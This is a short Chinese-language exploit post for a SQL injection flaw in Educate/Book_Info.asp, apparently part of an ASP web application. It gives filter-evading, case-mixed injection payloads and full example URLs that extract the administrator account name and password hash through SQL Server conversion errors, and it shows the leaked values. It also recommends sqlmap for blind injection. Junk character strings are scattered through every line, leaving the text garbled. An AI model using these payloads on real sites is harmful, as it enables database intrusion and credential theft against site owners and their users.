漏洞出现在Educate/Book_Info.asp 4 A. \3 A- R" W6 Z5 x
- X6 Y5 G+ x% \6 o1 W: T此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
3 O! `) x2 S8 ^6 H: d9 Z ) c8 n+ c M! |- V2 J% A
exp:如下
- Q( E5 x5 d! D5 f查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
4 k6 v, O) z" ~4 j8 }查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)3 p# b; w3 D& ?
% t1 X0 h/ K7 hhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
0 x! E% X5 n1 S$ v' F g- \7 j
5 y+ Z) w7 O6 o2 gMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'7 d% z8 r* A4 F7 _
& N0 | X- B; c
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。+ z9 O; K1 o" U" J* i5 B
: p& o3 e# @) h/Educate/Book_Info.asp,行 87 F3 z2 U* m+ @
- J2 s0 b8 W8 S8 p
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)- U* z7 K% i7 k; \0 }$ o" F; Y! ]
! t3 z1 |+ K* \8 Y8 l# q, ^
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'. S/ Z! s2 B5 f+ W5 m4 }2 ^
) Y: A% N' U- \
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。4 F, g: R. j) h* @$ B
( D; Z" n1 X% h2 r: n' ~0 }9 c$ t
/Educate/Book_Info.asp,行 8
" |9 x5 r" i' b& E/ y B |